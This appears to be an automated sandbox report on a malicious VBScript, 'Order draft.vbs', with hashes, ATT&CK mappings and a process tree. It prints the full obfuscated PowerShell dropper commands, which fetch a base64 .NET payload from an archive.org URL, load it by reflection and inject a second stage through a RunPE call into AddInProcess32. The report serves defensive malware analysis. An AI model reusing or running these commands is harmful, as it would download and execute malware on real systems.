e5550d60a971336699ae2ddf5a88ef9ef0e2ac8d9bae8db9ebadf8e360ad3df1

General

Target

Order draft.vbs
Size

504KB
MD5

581a2142bc26026893bbdfab4e65f694
SHA1

e5b3a5977750cd34a69e908bf22893f153b9301f
SHA256

e5550d60a971336699ae2ddf5a88ef9ef0e2ac8d9bae8db9ebadf8e360ad3df1
SHA512

5f74d6b90e9791f7c403690126fdd4f0bfcfde9dcd099d1ef0adb72d8f94b89ed1e9f708eaf2e853da1a681cbf3695e0421191f52902870dfbcedad5b9ff8808
SSDEEP

12288:u9M/PycpcyDgDy8f1xLWFIZni8itFw9UPpVaElOOywO5lowt4sG50v8eKjDo6c5l:S0ifJtH

Score

10^/10

execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt

exe.dropper

https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt

Signatures

Blocklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow	pid	Process
5	1584	powershell.exe
6	1584	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

Processes:

powershell.exepowershell.exe

pid	Process
2760	powershell.exe
1584	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

powershell.exepowershell.exe

pid	Process
2760	powershell.exe
1584	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description	pid	Process
Token: SeDebugPrivilege	2760	powershell.exe
Token: SeDebugPrivilege	1584	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

Processes:

WScript.exepowershell.exe

description	pid	Process	procid_target
PID 2240 wrote to memory of 2760	2240	WScript.exe	30
PID 2240 wrote to memory of 2760	2240	WScript.exe	30
PID 2240 wrote to memory of 2760	2240	WScript.exe	30
PID 2760 wrote to memory of 1584	2760	powershell.exe	32
PID 2760 wrote to memory of 1584	2760	powershell.exe	32
PID 2760 wrote to memory of 1584	2760	powershell.exe	32

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Order draft.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:2240
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezB9JysndXJsID0nKycgeycrJzJ9aHQnKyd0JysncHM6JysnLycrJy8nKydpYTYwJysnMDEnKycwMC4nKyd1cy5hJysncicrJ2NoaXZlLicrJ29yZy8yNC8nKydpdGVtcy8nKydkZXRhaC1ub3RlLXYvRGV0YWhOb3QnKydlVi4nKyd0eHR7Mn0nKyc7eycrJzB9YmEnKydzZTY0QycrJ29udCcrJ2VuJysndCcrJyA9JysnIChOZScrJ3ctJysnTycrJ2InKydqZWN0JysnIFN5cycrJ3RlbS4nKydOZXQuV2ViQ2wnKydpJysnZW4nKyd0JysnKS4nKydEb3dubG8nKydhZFN0cicrJ2luZygnKyd7MH11JysncicrJ2wpJysnO3swfWJpJysnbmFyeUNvbnQnKydlJysnbnQgJysnPSAnKydbU3knKydzdCcrJ2UnKydtJysnLicrJ0NvbnZlcnQnKyddOicrJzpGcicrJ29tQmEnKydzZScrJzYnKyc0JysnU3QnKydyaW4nKydnKHswfScrJ2Jhc2U2JysnNENvJysnbnQnKydlbnQpJysnOycrJ3swfScrJ2EnKydzJysnc2VtJysnYmx5ID0gW1InKydlJysnZicrJ2xlYycrJ3RpJysnbycrJ24uJysnQScrJ3NzZW1ibHldOjpMb2FkKHswJysnfWJpbmFyeUNvbnRlbnQnKycpOycrJ3swJysnfXQnKyd5JysncGUgJysnPSB7MH1hcycrJ3NlJysnbWJseS5HJysnZScrJ3QnKydUeXBlKHsyJysnfVJ1blBFLicrJ0hvJysnbWV7Mn0nKycpJysnOycrJ3swfW1ldGhvJysnZCAnKyc9ICcrJ3swfXQnKyd5cGUuR2V0TScrJ2V0aCcrJ29kKHsyfVZBJysnSXsyfScrJyknKyc7eycrJzB9bWV0JysnaCcrJ29kLkludm9rZScrJyh7JysnMH1udWwnKydsLCAnKydbb2JqZWN0W10nKyddQCh7Mn0nKyc3NWViMjA5YzU0ZDYtY2E3JysnOCcrJy1hM2I0LTMnKyc1ZDctMDE3ZGJjJysnNWMnKyc9bmUnKydrJysnb3QmYScrJ2lkZScrJ209JysndCcrJ2wnKydhJysnP3QnKyd4dCcrJy5lJysnc2FiJysnL28nKycvbScrJ29jJysnLicrJ3RvcHNwJysncGEnKycuMycrJzJlMycrJzUnKycteXRpYy0nKydyZScrJ2J5Yy8nKydiJysnLycrJzB2L21vYy5zaXBhZWwnKydnb29nJysnLmVnJysnYScrJ3InKydvdHMnKydlJysnc2FiJysnZXJpJysnZicrJy8nKycvJysnOnMnKydwdHRoJysnezJ9ICwgJysnezJ9MXsyfScrJyAsJysnIHsyfUMnKyc6ezF9UCcrJ3InKydvZ3JhJysnbScrJ0QnKydhdCcrJ2F7MX17JysnMn0gLCcrJyB7JysnMicrJ31hcmFuZW9ncicrJ2FmaWF7JysnMn0sezJ9QWRkJysnSW5Qcm9jZScrJ3NzMzJ7Mn0nKycsezJ9eycrJzInKyd9KSknKSAgLUYgW0NIYXJdMzYsW0NIYXJdOTIsW0NIYXJdMzkpfCAmKCAkRW5WOmNvbXNQZWNbNCwyNCwyNV0tak9JbicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2760
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{0}'+'url ='+' {'+'2}ht'+'t'+'ps:'+'/'+'/'+'ia60'+'01'+'00.'+'us.a'+'r'+'chive.'+'org/24/'+'items/'+'detah-note-v/DetahNot'+'eV.'+'txt{2}'+';{'+'0}ba'+'se64C'+'ont'+'en'+'t'+' ='+' (Ne'+'w-'+'O'+'b'+'ject'+' Sys'+'tem.'+'Net.WebCl'+'i'+'en'+'t'+').'+'Downlo'+'adStr'+'ing('+'{0}u'+'r'+'l)'+';{0}bi'+'naryCont'+'e'+'nt '+'= '+'[Sy'+'st'+'e'+'m'+'.'+'Convert'+']:'+':Fr'+'omBa'+'se'+'6'+'4'+'St'+'rin'+'g({0}'+'base6'+'4Co'+'nt'+'ent)'+';'+'{0}'+'a'+'s'+'sem'+'bly = [R'+'e'+'f'+'lec'+'ti'+'o'+'n.'+'A'+'ssembly]::Load({0'+'}binaryContent'+');'+'{0'+'}t'+'y'+'pe '+'= {0}as'+'se'+'mbly.G'+'e'+'t'+'Type({2'+'}RunPE.'+'Ho'+'me{2}'+')'+';'+'{0}metho'+'d '+'= '+'{0}t'+'ype.GetM'+'eth'+'od({2}VA'+'I{2}'+')'+';{'+'0}met'+'h'+'od.Invoke'+'({'+'0}nul'+'l, '+'[object[]'+']@({2}'+'75eb209c54d6-ca7'+'8'+'-a3b4-3'+'5d7-017dbc'+'5c'+'=ne'+'k'+'ot&a'+'ide'+'m='+'t'+'l'+'a'+'?t'+'xt'+'.e'+'sab'+'/o'+'/m'+'oc'+'.'+'topsp'+'pa'+'.3'+'2e3'+'5'+'-ytic-'+'re'+'byc/'+'b'+'/'+'0v/moc.sipael'+'goog'+'.eg'+'a'+'r'+'ots'+'e'+'sab'+'eri'+'f'+'/'+'/'+':s'+'ptth'+'{2} , '+'{2}1{2}'+' ,'+' {2}C'+':{1}P'+'r'+'ogra'+'m'+'D'+'at'+'a{1}{'+'2} ,'+' {'+'2'+'}araneogr'+'afia{'+'2},{2}Add'+'InProce'+'ss32{2}'+',{2}{'+'2'+'}))') -F [CHar]36,[CHar]92,[CHar]39)| &( $EnV:comsPec[4,24,25]-jOIn'')"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1584

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
b212b0ebc0a41e80343d4a2829331899

SHA1
38649edb19318645adaf5d43a9d07c2cdcd3529a

SHA256
0c4e08a84711a12b3a5d2ee66e8f576b448a429138a46249a185d65375f465f3

SHA512
c12c85e4d9b79cfb1d4a0b1bbd2aab2d1f733a429471a0612516464ec4bb42a1ea34a4136d633371d3219746b495b04fcfb83abfa52a4dedbc45600df3e96a39

Download Submit
memory/2760-4-0x000007FEF5F0E000-0x000007FEF5F0F000-memory.dmp

Filesize
4KB

Download
memory/2760-5-0x000000001B760000-0x000000001BA42000-memory.dmp

Filesize
2.9MB

Download
memory/2760-6-0x0000000001E70000-0x0000000001E78000-memory.dmp

Filesize
32KB

Download
memory/2760-7-0x000007FEF5C50000-0x000007FEF65ED000-memory.dmp

Filesize
9.6MB

Download
memory/2760-8-0x000007FEF5C50000-0x000007FEF65ED000-memory.dmp

Filesize
9.6MB

Download
memory/2760-9-0x000007FEF5C50000-0x000007FEF65ED000-memory.dmp

Filesize
9.6MB

Download
memory/2760-10-0x000007FEF5C50000-0x000007FEF65ED000-memory.dmp

Filesize
9.6MB

Download
memory/2760-16-0x000007FEF5C50000-0x000007FEF65ED000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads